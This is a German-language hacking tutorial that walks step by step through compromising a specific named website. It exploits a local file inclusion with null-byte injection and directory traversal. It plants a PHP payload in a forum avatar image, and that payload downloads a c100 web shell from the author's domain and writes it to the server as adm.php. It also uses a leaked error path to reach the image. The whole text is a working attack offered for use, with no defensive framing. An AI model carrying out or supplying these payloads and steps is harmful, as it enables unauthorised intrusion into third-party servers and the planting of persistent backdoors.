################################
######Kleines LFI Beispiel######
####anhand eines NoobServers####
################################
0x00000001 — Schadcode einspielen
Das Opfer; http://amedira.de/
Wir sehen bereits oben ein schönes Menü,…
Wenn wir jetzt auf Download klicken, sehen wir bereits das downloads via GET-Parameter aufgerufen wird.
Als nächstest versuchen wir was passiert wenn wir .php hinten drann. Es passiert nix, also .php und ein 0BitByte drann (%00) = http://amedira.de/index.php?s=downloads.php%00
und wieder sind wir auf der Downloads-Seite.
Wir sehen außerdem an der Linken Seite einen Menüpunkt namens Community; dies dürfte Forum sein — Ist es auch. wenn wir dem weiterfolgen kommen wir in ein WBB.
Wir registrieren uns, und gehen auf Profil bearbeiten. Anschließend nehmene wir DIESES BILD als Avatar: http://finalflash.lima-city.de/abc/logo.png
Ist ein von mir Manipuliertes Bild, welches den Schadcode:
<?php $datei = fopen(„adm.php“,“w+“);$stream = fopen(„http://finalflash.lima-city.de/abc/c100.txt“, „r“);while (!feof($stream)) { $shell .= fgets($stream); } fwrite($datei,$shell);fclose($stream);fclose($date i); ?>
enthält. Dieser zieht von meiner Domain folgende Datei (finalflash.lima-city.de/abc/c100.txt) als Stream auf dem Server in das Verzeichniss wo die index.php liegt.
Kopiert euch die Url vom Bild und öffnet in einem neuem Tab.
Tada, unser PHP Code liegt am Server, ist jedoch immer noch ein Bild.
0x00000002 — Schadcode ausführen
Als erstes rufen wir eine Datei aus WBB auf, welche OHNE Parameter o.Ä. einen schönen Fehler ausgibt. Dieser Link: http://board.amedira.de/wcf/lib/syst…ager.class.php
Unser Output sieht wie folgt aus:
Warning: require_once(WCF_DIRlib/data/style/Style.class.php) [function.require-once]:
failed to open stream: No such file or directory in /mnt/webd/d3/93/53033493/htdocs/amedira/board/wcf/lib/system/style/StyleManager.class.php on line 3
Wir haben hier bereits den Pfad wo das Board am Server liegt.
Wir errinern uns zurück an Schritt 1 — http://amedira.de/index.php?s=downloads.php%00
Jetzt müssen wir das Bild noch via PHP ausfüren; Das ist einfach Durch folgendem Code erhalten wir die Ordnerstrucktur: http://amedira.de/index.php?s=../%00
Nun includen wir mal eine Datei welche 8 Unterverzeichnisse weiter weg liegt.
../ Heißt gehe um 1 Verzeichniss zurück.
http://amedira.de/index.php?s=../../…./../../../%00 <– So sind wir jetzt im Root Verzeichniss…
Von vorher haben wir noch den Output wo das Board liegt. /mnt/webd/d3/93/53033493/htdocs/amedira/board/wcf/lib/system/style/StyleManager.class.php
Davon brauchen wir jetzt nur das /mnt/webd/d3/93/53033493/htdocs/amedira/board/wcf/ + images/avatars/avatar-28.png
Das includen wir jetzt. Ändert dazu eure Urlz zu folgendem:
http://amedira.de/index.php?s=../../…atar-28.png%00
Ihr bekommt ein paar seltsame Zeichen, was soviel heißt wie *Cool, du hast den Server gehackt.*
fopen(„adm.php“,“w+“) Die Shell liegt jetzt im Verzeichniss mit der index.php –> http://amedira.de/adm.php